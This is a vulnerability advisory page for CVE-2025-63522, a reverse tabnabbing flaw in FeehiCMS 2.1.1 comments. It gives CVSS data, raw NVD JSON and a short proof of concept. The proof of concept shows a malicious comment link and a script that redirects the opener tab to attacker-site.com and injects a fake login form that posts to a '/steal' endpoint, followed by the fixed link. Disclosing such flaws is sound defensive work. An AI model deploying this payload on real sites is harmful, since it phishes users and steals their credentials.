Security Vulnerability Report
中文
CVE-2025-63522 CVSS 4.6 MEDIUM

CVE-2025-63522

Published: 2025-12-01 15:15:51
Last Modified: 2025-12-02 03:06:47

Description

Reverse Tabnabbing vulnerability in FeehiCMS 2.1.1 in the Comments Management function

CVSS Details

CVSS Score
4.6
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:feehi:feehicms:2.1.1:*:*:*:*:*:*:* - VULNERABLE
FeehiCMS 2.1.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- 恶意评论内容示例 --> <a href="https://attacker-site.com/phishing-page" target="_blank">点击查看详情</a> <!-- 恶意网站上的脚本 --> <script> // 检查window.opener是否存在 if (window.opener) { // 重定向原始页面到钓鱼网站 window.opener.location.href = "https://attacker-site.com/fake-login"; // 或者注入恶意内容 window.opener.document.body.innerHTML = "<h1>Session Expired</h1><form action='https://attacker-site.com/steal'>..."; } </script> <!-- 修复后的安全写法 --> <a href="https://attacker-site.com/phishing-page" target="_blank" rel="noopener noreferrer">点击查看详情</a>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-63522", "sourceIdentifier": "[email protected]", "published": "2025-12-01T15:15:50.847", "lastModified": "2025-12-02T03:06:47.173", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Reverse Tabnabbing vulnerability in FeehiCMS 2.1.1 in the Comments Management function"}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N", "baseScore": 4.6, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.1, "impactScore": 2.5}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-1021"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:feehi:feehicms:2.1.1:*:*:*:*:*:*:*", "matchCriteriaId": "DBEE4749-21CC-4336-8565-A05BC680EDF2"}]}]}], "references": [{"url": "https://github.com/kiwi865/CVEs/blob/main/CVE-2025-63522.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://github.com/liufee/cms/issues/76", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Vendor Advisory"]}]}}